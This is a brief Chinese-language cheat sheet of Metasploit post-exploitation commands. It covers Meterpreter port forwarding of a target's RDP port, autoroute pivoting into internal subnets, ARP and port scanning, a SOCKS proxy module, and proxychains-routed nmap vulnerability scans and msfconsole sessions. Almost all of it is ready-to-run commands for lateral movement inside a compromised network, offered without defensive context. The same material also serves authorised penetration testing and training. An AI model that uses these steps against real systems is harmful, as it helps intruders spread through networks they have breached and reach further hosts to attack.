MSF后渗透的一些操作
端口转发
meterpreter > portfwd add -l 2222 -r 172.16.1.156 -p 3389 #将目标机172.16.1.156的3389端口转发到本地2222端口
meterpreter > portfwd list #查看转发列表
meterpreter > portfwd flush #清空转发列表
rdesktop 127.0.0.1:2222 #kali远程桌面使用2222端口
添加路由,横向渗透(跨网段攻击)
run autoroute -s 172.16.2.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由
route print #打印路由
run post/windows/gather/arp_scanner RHOSTS=172.16.2.0/24 #扫描整个段存活主机
run auxiliary/scanner/portscan/tcp RHOSTS=172.16.2.11 PORTS=3389 #检查IP是否开放3389
利用arp扫描内网主机
use post/windows/gather/arp_scanner
set rhosts 172.16.2.0/24
set session 1
exploit
Socks代理篇
新版的msf和老版的不一样,代理模块也不一样。
auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvport 7777
srvport => 7777
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
配置proxychains
用代理软件去连接建立好的socks隧道,便可以成功访问内网。
vi /etc/proxychains.conf #添加 socks5 127.0.0.1 7777
proxychains+nmap扫描主机是否存在漏洞
proxychains nmap -sT -Pn -p445 --script=vuln 192.168.52.141
proxychains使用msf框架
proxychains msfconsole